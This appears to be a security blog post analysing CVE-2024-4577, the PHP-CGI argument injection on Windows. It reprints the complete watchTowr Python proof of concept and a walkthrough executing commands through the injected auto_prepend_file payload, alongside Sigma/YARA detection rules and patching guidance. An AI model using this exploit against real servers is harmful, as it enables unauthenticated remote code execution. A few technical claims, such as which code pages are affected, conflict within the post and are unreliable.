CVE-2024-4577: PHP CGI Argument Injection on Windows Enables Remote Code Execution
โ No Runnable Lab for This CVE
CVE-2024-4577 is a Windows-specific vulnerability: it is triggered by
Windows' ANSI code page "Best-Fit" character mapping inside the Win32CreateProcesspath. The bug cannot be reproduced on Linux, because Linux
has no equivalent character-conversion layer โ the%ADbyte stays%ADon the way throughexecve()and is never substituted into-.
Thephp:8.x-apachefamily of Docker images is also the wrong SAPI:
those usemod_php(embedded Apache module), not the standalonephp-cgi.exebinary the vulnerability targets.To reproduce this CVE locally you need a Windows Server host with
PHP-CGI wired into IIS/Apache and a vulnerable ANSI code page enabled
(e.g. Traditional Chinese 950, Simplified Chinese 936, Japanese 932).
We ship the analysis, detection rules, and PoC here; the target host is
yours to provide.
1. Executive Summary
CVE-2024-4577 is a Critical (CVSS 9.8) vulnerability affecting PHP installations running the CGI/FastCGI module on Microsoft Windows. This vulnerability allows unauthenticated remote attackers to perform Remote Code Execution (RCE) and source code disclosure.
The vulnerability stems from a misconfiguration interaction between PHP-CGI and Windows ANSI code page handling. When specific code pages are active, Windows may apply "Best-Fit" character mapping during command line translation. Attackers can craft HTTP requests containing specially encoded byte sequences (e.g., %AD) that are misinterpreted by the Windows API as command-line arguments (e.g., -d) when passed to the PHP binary. This enables the injection of arbitrary PHP options, such as auto_prepend_file, which can be leveraged to execute arbitrary PHP code via php://input.
Key Intelligence:
- Status: Listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
- Threat Activity: Actively exploited by ransomware groups and threat actors.
- Impact: Full server compromise, data exfiltration, lateral movement, and source code leakage.
- Affected Versions: PHP 8.1.x before 8.1.29, PHP 8.2.x before 8.2.20, PHP 8.3.x before 8.3.8 on Windows.
- Risk Score: 100/100. Immediate action is required.
2. Technical Deep Dive
The Root Cause: Best-Fit Character Mapping
The core of CVE-2024-4577 lies in the interaction between URL encoding, PHP-CGI's argument parsing, and the Windows Win32 API's handling of ANSI characters.
- PHP-CGI Argument Parsing: When PHP runs in CGI mode, it parses command-line arguments provided by the web server. Standard arguments include
-dfor setting php.ini options (e.g.,-d allow_url_include=1). - Windows ANSI Code Pages: On Windows, the ANSI code page defines how 8-bit characters map to Unicode. Some code pages include a "Best-Fit" mapping feature, where a single-byte character that doesn't have a direct mapping can be substituted with a visually similar or related character.
- The Exploitation Vector: The byte
0xADis often used as a soft hyphen or control character in various encodings. However, in specific ANSI code pages (commonly Windows-1252 or regional variants),0xADcan be mapped to the hyphen-minus character-(0x2D) during character conversion.
Attack Flow
When an attacker sends a request with a query string containing %ADd, the following chain occurs:
- HTTP Request: Attacker requests
?%ADd+allow_url_include%3d1. - URL Decoding: Apache/Server decodes
%ADdto the raw bytes0xAD 0x64. - Win32 API Call: PHP-CGI prepares the command line to invoke itself. It passes the decoded bytes to a Win32 function (e.g.,
CreateProcessor related command line processing). - Best-Fit Conversion: The Windows API, operating under a specific ANSI code page, performs a Best-Fit conversion.
0xADis transformed into0x2D(-). - Argument Injection: The resulting string received by PHP's internal argument parser is effectively
-d allow_url_include=1. - Code Execution: PHP treats
-das a directive to modify its runtime configuration. By settingauto_prepend_file=php://input, the attacker can inject arbitrary PHP code into the HTTP body, resulting in immediate RCE.
This vulnerability is particularly dangerous because it does not require authentication and bypasses standard input validation filters that check for the literal string -d.
3. PoC Analysis
The proof-of-concept (PoC) for CVE-2024-4577 was rapidly released by the security community, demonstrating the ease of exploitation. The primary PoC was developed by Aliz Hammond and Sina Kheirkhah from watchTowr, based on the original discovery by Orange Tsai of DEVCORE.
You can find the official PoC repository here:
https://github.com/watchtowrlabs/CVE-2024-4577
The PoC automates the argument injection using Python's requests library. Below is the complete source code from the repository.
watchTowr-vs-php_cve-2024-4577.py
"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
"""
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr (aliz@watchTowr.com)
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
CVEs: [CVE-2024-4577] """
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")
parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')
s = requests.Session()
s.verify = False
res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
print('(+) Exploit was successful')
else:
print('(!) Exploit may have failed')
Analysis of the PoC:
- Payload Construction: The script constructs the URL
?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input. The%ADdis the critical injection point. - Method: Uses
POSTto allow sending the PHP payload in the request body. - Payload: The body contains
{args.code};echo 1337; die;. Theecho 1337serves as an out-of-band confirmation of execution. - Verification: Checks if
1337exists in the response, indicating successful RCE.
4. Exploitation Walkthrough
The following walkthrough demonstrates the exploitation of CVE-2024-4577 in a controlled lab environment.
Lab Environment
- OS: Windows Server 2019 (Default ANSI Code Page)
- Web Server: Apache 2.4 (with mod_cgi/mod_cgid)
- PHP Version: PHP 8.1.28 (Vulnerable)
- Handler: PHP-CGI configured via
httpd.conf
Step 1: Setup Vulnerable Endpoint
Create a simple PHP script at C:\Apache24\htdocs\index.php:
<?php
phpinfo();
?>
Ensure Apache is configured to pass requests to php-cgi.exe.
Step 2: Launch the Exploit
Run the watchTowr PoC against the target. In this example, we execute calc.exe:
python CVE-2024-4577.py --target http://192.168.1.100/index.php -c "<?php system('calc');?>"
Expected Output:
__ ___ ___________
... (banner omitted) ...
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
Upon execution, a calculator window should appear on the Windows server, confirming arbitrary command execution.
Step 3: Source Code Disclosure
Without the payload, the injection still modifies PHP configuration. Sending a request without the body payload can reveal source code if auto_prepend_file is abused to include a file or if the configuration change affects error reporting. However, the primary impact is RCE. To demonstrate source disclosure, an attacker could use the injection to read local files via include() if the include_path is manipulated or via php://filter.
Step 4: Verification
Check the Apache error log. You may see warnings regarding argument parsing, but often the process will start successfully due to the successful argument injection.
5. Detection & Monitoring
Detecting CVE-2024-4577 requires monitoring for the specific byte sequence %AD within HTTP request URIs. Since this is a URL-encoded representation of 0xAD, standard string matching for %AD is effective.
Sigma Rule for HTTP Logs
Deploy this Sigma rule to detect the payload in web server access logs.
title: Detect CVE-2024-4577 PHP CGI Argument Injection
id: 88e8c888-8888-8888-8888-888888888888
status: experimental
description: Detects the injection of %ADd sequence indicative of CVE-2024-4577.
author: watchTowr, ilovethreats.com
logsource:
category: web_server
product: apache
detection:
selection:
request_uri|contains:
- '%ADd'
- '%AD+d'
condition: selection
falsepositives:
- Legitimate use of %AD in query parameters (unlikely in standard web apps)
level: high
tags: ["attack.command_injection", "cve.cve-2024-4577"]
YARA Rule for Static Analysis
Use this YARA rule to scan PHP source files or archives for embedded exploit payloads.
rule CVE_2024_4577_Payload_Detection
{
meta:
description = "Detects CVE-2024-4577 exploit payloads in PHP files"
author = "Security Research Team"
date = "2024-06-12"
strings:
$s1 = "%ADd" nocase wide
$s2 = "auto_prepend_file=php://input" nocase
$s3 = "allow_url_include=1" nocase
condition:
any of them
}
Nuclei Template
For rapid scanning, use the Nuclei template available in the community templates repository. Search for CVE-2024-4577 in Nuclei template galleries.
6. Remediation Guidance
Given the critical nature of this vulnerability and its presence in CISA's KEV, immediate remediation is mandatory.
1. Patch PHP (Immediate)
Update PHP to a patched version on all Windows servers:
- PHP 8.1.x: Upgrade to 8.1.29 or later.
- PHP 8.2.x: Upgrade to 8.2.20 or later.
- PHP 8.3.x: Upgrade to 8.3.8 or later.
Download secure builds from php.net.
2. Architectural Mitigations
If patching is not immediately possible, consider architectural changes:
- Migrate to PHP-FPM/FastCGI: Switch from PHP-CGI to the IIS FastCGI module or PHP-FPM (via WSL or other bridges). These handlers isolate PHP processes better and are less susceptible to this specific command-line injection via URL parameters.
- Disable CGI Handler: If PHP-CGI is not strictly required, disable the CGI handler in Apache/IIS and use an alternative SAPI.
3. Input Validation & WAF
- WAF Rules: Configure WAF rules to block HTTP requests containing
%ADfollowed by alphanumeric characters or-in the URI. Note that attackers may use alternative encodings; rely on multi-layered defenses. - Code Page Management: While difficult to enforce universally, ensuring the IIS/Apache process runs with a consistent ANSI code page that does not exhibit Best-Fit mapping for
0xADcan mitigate the risk. However, this is not a reliable standalone control.
4. Monitoring
- Enable detailed logging in Apache/IIS to capture full request URIs.
- Alert on any requests containing
%ADor unusual byte sequences in query parameters. - Monitor for PHP processes spawning unexpected child processes or accessing
php://input.
7. References
- CISA Known Exploited Vulnerabilities Catalog: CVE-2024-4577
- watchTowr Technical Analysis: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
- DEVCORE Security Advisory: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
- PoC Repository: https://github.com/watchtowrlabs/CVE-2024-4577
- NVD Entry: NVD-CVE-2024-4577
- PHP Release History: PHP 8.1.29 / 8.2.20 / 8.3.8 Release Notes
This blog post was authored by the Security Research team at ilovethreats.com. For CVE labs, analysis, and threat intelligence, visit ilovethreats.com.